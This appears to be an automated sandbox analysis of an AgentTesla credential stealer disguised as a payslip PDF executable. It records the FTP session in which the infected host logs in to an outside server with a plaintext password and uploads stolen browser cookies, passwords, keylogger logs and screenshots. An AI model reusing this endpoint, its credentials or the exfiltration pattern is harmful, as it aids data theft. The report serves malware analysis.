                                            Nov 4, 2024 10:13:20.712255001 CET2149716110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.364 seconds (measured here), 0.94 Kbytes per second
                                            Nov 4, 2024 10:13:20.739705086 CET4971621192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:21.124290943 CET2149716110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,250,15)
                                            Nov 4, 2024 10:13:21.141900063 CET4971621192.168.2.5110.4.45.197STOR CO_Chrome_Default.txt_user-960781_2024_11_04_10_31_56.txt
                                            Nov 4, 2024 10:13:22.771806955 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:22.771951914 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:22.771981955 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:25.844021082 CET2149745110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 28 of 50 allowed.
                                            220-Local time is now 17:13. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:25.844403028 CET4974521192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:13:25.844455957 CET2149745110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 28 of 50 allowed.
                                            220-Local time is now 17:13. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:26.184287071 CET2149745110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:13:26.185314894 CET4974521192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:13:26.556669950 CET2149745110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:13:26.900331974 CET2149745110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:13:26.900731087 CET4974521192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:13:27.240027905 CET2149745110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:13:27.242155075 CET4974521192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:13:27.580374956 CET2149745110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:13:27.581007957 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:27.918997049 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,250,83)
                                            Nov 4, 2024 10:13:27.924803972 CET4974521192.168.2.5110.4.45.197STOR PW_user-960781_2024_11_04_04_13_24.html
                                            Nov 4, 2024 10:13:28.852077007 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:29.205054045 CET2149745110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.351 seconds (measured here), 0.97 Kbytes per second
                                            Nov 4, 2024 10:13:29.240055084 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:29.577224016 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,219,73)
                                            Nov 4, 2024 10:13:29.582776070 CET4974521192.168.2.5110.4.45.197STOR CO_Chrome_Default.txt_user-960781_2024_11_04_10_41_57.txt
                                            Nov 4, 2024 10:13:30.494503021 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:30.842742920 CET2149745110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.348 seconds (measured here), 0.81 Kbytes per second
                                            Nov 4, 2024 10:13:30.843142986 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:31.181891918 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,255,55)
                                            Nov 4, 2024 10:13:31.187427044 CET4974521192.168.2.5110.4.45.197STOR CO_Edge Chromium_Default.txt_user-960781_2024_11_04_12_50_48.txt
                                            Nov 4, 2024 10:13:32.126950026 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:32.476691008 CET2149745110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:13:32.477042913 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:32.816212893 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,226,198)
                                            Nov 4, 2024 10:13:32.821898937 CET4974521192.168.2.5110.4.45.197STOR CO_Firefox_v6zchhhv.default-release.txt_user-960781_2024_11_04_14_59_19.txt
                                            Nov 4, 2024 10:13:33.740529060 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:34.090506077 CET2149745110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:14:32.624996901 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:33.182800055 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,247,131)
                                            Nov 4, 2024 10:14:33.188241005 CET4970921192.168.2.5110.4.45.197STOR KL_user-960781_2024_11_17_21_53_38.html
                                            Nov 4, 2024 10:14:34.113265038 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:34.464957952 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.350 seconds (measured here), 0.80 Kbytes per second
                                            Nov 4, 2024 10:14:35.123785973 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:35.485382080 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,219,230)
                                            Nov 4, 2024 10:14:35.490983963 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_21_00_44_12.jpeg
                                            Nov 4, 2024 10:14:36.384284019 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:37.137233019 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.753 seconds (measured here), 87.18 Kbytes per second
                                            Nov 4, 2024 10:14:42.815064907 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:43.174119949 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,193,220)
                                            Nov 4, 2024 10:14:43.179708958 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_26_10_28_10.jpeg
                                            Nov 4, 2024 10:14:44.120671988 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:44.955656052 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.820 seconds (measured here), 78.62 Kbytes per second
                                            Nov 4, 2024 10:14:53.779392958 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:54.134797096 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,207,235)
                                            Nov 4, 2024 10:14:54.141563892 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_03_03_34_51.jpeg
                                            Nov 4, 2024 10:14:55.062520981 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:55.841114998 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.779 seconds (measured here), 82.78 Kbytes per second
                                            Nov 4, 2024 10:14:57.506872892 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:57.868077993 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,201,56)
                                            Nov 4, 2024 10:14:57.882333040 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_06_22_46_31.jpeg
                                            Nov 4, 2024 10:14:58.959717035 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:59.047811031 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:59.746118069 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.947 seconds (measured here), 68.04 Kbytes per second
                                            Nov 4, 2024 10:15:09.796015024 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:10.151797056 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,227,49)
                                            Nov 4, 2024 10:15:10.157993078 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_14_10_46_01.jpeg
                                            Nov 4, 2024 10:15:11.089180946 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:11.887828112 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.801 seconds (measured here), 80.50 Kbytes per second
                                            Nov 4, 2024 10:15:11.957633018 CET2150004110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 28 of 50 allowed.
                                            220-Local time is now 17:15. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:15:11.960347891 CET5000421192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:15:13.237684011 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.237834930 CET5000421192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:15:13.237855911 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.238195896 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.238683939 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.596108913 CET2150004110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:15:13.933480024 CET2150004110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:15:13.938083887 CET5000421192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:15:14.275235891 CET2150004110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:15:14.275672913 CET5000421192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:15:15.378047943 CET2150004110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:15:15.378062010 CET2150004110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:15:15.378156900 CET2150004110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:15:15.378372908 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:15.714868069 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,252,135)
                                            Nov 4, 2024 10:15:15.731566906 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_27_19_12_39.jpeg
                                            Nov 4, 2024 10:15:16.665961027 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:17.490400076 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.824 seconds (measured here), 78.26 Kbytes per second
                                            Nov 4, 2024 10:15:19.968859911 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:20.324122906 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,228,129)
                                            Nov 4, 2024 10:15:20.334019899 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_20_15_57_08.jpeg
                                            Nov 4, 2024 10:15:21.267529011 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:22.076407909 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.809 seconds (measured here), 79.67 Kbytes per second
                                            Nov 4, 2024 10:15:27.903599977 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:28.259224892 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,210,92)
                                            Nov 4, 2024 10:15:28.265204906 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_27_15_05_20.jpeg
                                            Nov 4, 2024 10:15:29.161972046 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:30.841465950 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.756 seconds (measured here), 85.27 Kbytes per second
                                            Nov 4, 2024 10:15:30.841900110 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.756 seconds (measured here), 85.27 Kbytes per second
                                            Nov 4, 2024 10:15:30.842664003 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.756 seconds (measured here), 85.27 Kbytes per second
                                            Nov 4, 2024 10:15:34.296973944 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:34.644059896 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,212,106)
                                            Nov 4, 2024 10:15:34.654119968 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_15_21_24_05.jpeg
                                            Nov 4, 2024 10:15:35.570746899 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:36.351334095 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.783 seconds (measured here), 82.35 Kbytes per second
                                            Nov 4, 2024 10:16:00.077168941 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:00.432797909 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,223,232)
                                            Nov 4, 2024 10:16:00.450118065 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_12_15_26_53.jpeg
                                            Nov 4, 2024 10:16:01.360764027 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:02.145546913 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.774 seconds (measured here), 83.25 Kbytes per second
                                            Nov 4, 2024 10:16:03.409333944 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:03.745415926 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,242,121)
                                            Nov 4, 2024 10:16:03.760102987 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_01_16_59_51.jpeg
                                            Nov 4, 2024 10:16:04.662096024 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:05.405729055 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.743 seconds (measured here), 86.80 Kbytes per second
                                            Nov 4, 2024 10:16:11.626420975 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:12.144942045 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,254,3)
                                            Nov 4, 2024 10:16:12.152189970 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_19_18_31_18.jpeg
                                            Nov 4, 2024 10:16:13.058892012 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:13.835012913 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.777 seconds (measured here), 83.01 Kbytes per second
                                            Nov 4, 2024 10:16:15.858046055 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:16.213022947 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,207,164)
                                            Nov 4, 2024 10:16:16.230137110 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_23_18_07_24.jpeg
                                            Nov 4, 2024 10:16:17.184423923 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:18.000878096 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.820 seconds (measured here), 78.60 Kbytes per second
                                            Nov 4, 2024 10:16:19.594584942 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:19.930874109 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,241,231)
                                            Nov 4, 2024 10:16:19.942167044 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_10_20_38_28.jpeg
                                            Nov 4, 2024 10:16:20.848534107 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:21.615130901 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226 0.767 seconds (measured here), 84.09 Kbytes per second
                                            Nov 4, 2024 10:16:22.842093945 CET2150016110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 31 of 50 allowed.
                                            220-Local time is now 17:16. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:16:22.842247963 CET5001621192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:16:23.191158056 CET2150016110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:16:23.191308975 CET  50016  21  192.168.2.5  110.4.45.197  PASS JesusChrist007$
                                            Nov 4, 2024 10:16:23.561048031 CET  21  50016  110.4.45.197  192.168.2.5  230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:16:23.910518885 CET  21  50016  110.4.45.197  192.168.2.5  504 Unknown command
                                            Nov 4, 2024 10:16:23.916021109 CET  50016  21  192.168.2.5  110.4.45.197  PWD
                                            Nov 4, 2024 10:16:24.265996933 CET  21  50016  110.4.45.197  192.168.2.5  257 "/" is your current location
                                            Nov 4, 2024 10:16:24.272486925 CET  50016  21  192.168.2.5  110.4.45.197  TYPE I
                                            Nov 4, 2024 10:16:24.623590946 CET  21  50016  110.4.45.197  192.168.2.5  200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:16:24.627492905 CET  50016  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:24.996318102 CET  21  50016  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,198,64)
                                            Nov 4, 2024 10:16:25.001816034 CET  50016  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_01_28_14_34_54.jpeg
                                            Nov 4, 2024 10:16:25.781315088 CET  49709  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:25.904494047 CET  21  50016  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:26.136900902 CET  21  49709  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,229,157)
                                            Nov 4, 2024 10:16:26.142653942 CET  49709  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_02_01_11_59_33.jpeg
                                            Nov 4, 2024 10:16:26.681606054 CET  21  50016  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.777 seconds (measured here), 82.97 Kbytes per second
                                            Nov 4, 2024 10:16:27.075494051 CET  21  49709  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:27.518811941 CET  50016  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:27.841684103 CET  21  49709  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.767 seconds (measured here), 84.07 Kbytes per second
                                            Nov 4, 2024 10:16:28.184540033 CET  21  50016  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,224,155)
                                            Nov 4, 2024 10:16:28.192312002 CET  50016  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_02_04_10_36_53.jpeg
                                            Nov 4, 2024 10:16:29.119743109 CET  21  50016  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:29.259356022 CET  49709  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:29.614650965 CET  21  49709  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,234,99)
                                            Nov 4, 2024 10:16:29.620557070 CET  49709  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_02_07_09_20_45.jpeg
                                            Nov 4, 2024 10:16:29.893259048 CET  21  50016  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.774 seconds (measured here), 83.32 Kbytes per second
                                            Nov 4, 2024 10:16:30.514843941 CET  21  49709  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:31.032507896 CET  50004  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:31.262309074 CET  21  49709  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.747 seconds (measured here), 86.27 Kbytes per second
                                            Nov 4, 2024 10:16:31.368158102 CET  21  50004  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,209,52)
                                            Nov 4, 2024 10:16:31.373780012 CET  50004  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_01_18_02_28_20.jpeg
                                            Nov 4, 2024 10:16:32.277887106 CET  21  50004  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:33.051167011 CET  21  50004  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.774 seconds (measured here), 83.33 Kbytes per second
                                            Nov 4, 2024 10:16:39.517585993 CET  50004  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:39.854044914 CET  21  50004  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,205,111)
                                            Nov 4, 2024 10:16:39.875107050 CET  50004  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_01_23_22_58_49.jpeg
                                            Nov 4, 2024 10:16:40.778814077 CET  21  50004  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:41.545667887 CET  21  50004  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.767 seconds (measured here), 90.24 Kbytes per second
                                            Nov 4, 2024 10:16:49.846080065 CET  49709  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:16:50.204061985 CET  21  49709  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,222,114)
                                            Nov 4, 2024 10:16:50.213270903 CET  49709  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_02_18_12_47_44.jpeg
                                            Nov 4, 2024 10:16:51.127051115 CET  21  49709  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:16:51.906769037 CET  21  49709  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.783 seconds (measured here), 82.32 Kbytes per second
                                            Nov 4, 2024 10:16:58.451360941 CET  21  50024  110.4.45.197  192.168.2.5  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 32 of 50 allowed.
                                            220-Local time is now 17:16. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:16:58.457046986 CET  50024  21  192.168.2.5  110.4.45.197  USER origin@haliza.com.my
                                            Nov 4, 2024 10:16:58.812264919 CET  21  50024  110.4.45.197  192.168.2.5  331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:16:58.816231012 CET  50024  21  192.168.2.5  110.4.45.197  PASS JesusChrist007$
                                            Nov 4, 2024 10:16:59.197164059 CET  21  50024  110.4.45.197  192.168.2.5  230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:16:59.552597046 CET  21  50024  110.4.45.197  192.168.2.5  504 Unknown command
                                            Nov 4, 2024 10:16:59.552714109 CET  50024  21  192.168.2.5  110.4.45.197  PWD
                                            Nov 4, 2024 10:17:00.009773016 CET  21  50024  110.4.45.197  192.168.2.5  257 "/" is your current location
                                            Nov 4, 2024 10:17:00.012265921 CET  50024  21  192.168.2.5  110.4.45.197  TYPE I
                                            Nov 4, 2024 10:17:00.412107944 CET  21  50024  110.4.45.197  192.168.2.5  200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:17:00.412257910 CET  50024  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:17:00.767286062 CET  21  50024  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,195,13)
                                            Nov 4, 2024 10:17:01.025422096 CET  21  50024  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,195,13)
                                            Nov 4, 2024 10:17:01.025851965 CET  50024  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_02_02_22_26_07.jpeg
                                            Nov 4, 2024 10:17:01.970776081 CET  21  50024  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:17:02.786523104 CET  21  50024  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.819 seconds (measured here), 78.66 Kbytes per second
                                            Nov 4, 2024 10:17:04.839067936 CET  50024  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:17:05.194322109 CET  21  50024  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,195,146)
                                            Nov 4, 2024 10:17:05.200253963 CET  50024  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2025_02_08_00_19_37.jpeg
                                            Nov 4, 2024 10:17:06.114967108 CET  21  50024  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:17:06.904292107 CET  21  50024  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.790 seconds (measured here), 81.62 Kbytes per second
                                            Nov 4, 2024 10:17:10.855658054 CET  49709  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:17:11.108489037 CET  50024  21  192.168.2.5  110.4.45.197  PASV
                                            Nov 4, 2024 10:17:11.212542057 CET  21  49709  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,210,143)
                                            Nov 4, 2024 10:17:11.217829943 CET  49709  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2024_11_04_04_17_10.jpeg
                                            Nov 4, 2024 10:17:11.465626955 CET  21  50024  110.4.45.197  192.168.2.5  227 Entering Passive Mode (110,4,45,197,208,166)
                                            Nov 4, 2024 10:17:11.472387075 CET  50024  21  192.168.2.5  110.4.45.197  STOR SC_user-960781_2024_11_04_04_17_10.jpeg
                                            Nov 4, 2024 10:17:12.140006065 CET  21  49709  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:17:12.398058891 CET  21  50024  110.4.45.197  192.168.2.5  150 Accepted data connection
                                            Nov 4, 2024 10:17:12.910747051 CET  21  49709  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.774 seconds (measured here), 83.32 Kbytes per second
                                            Nov 4, 2024 10:17:13.186772108 CET  21  50024  110.4.45.197  192.168.2.5  226-File successfully transferred
                                            226 0.789 seconds (measured here), 81.65 Kbytes per second


                                            Target ID:0
                                            Start time:04:12:59
                                            Start date:04/11/2024
                                            Path:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                                            Imagebase:0x580000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:04:13:00
                                            Start date:04/11/2024
                                            Path:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                                            Imagebase:0x790000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Target ID:4
                                            Start time:04:13:12
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xc50000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 34%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:5
                                            Start time:04:13:13
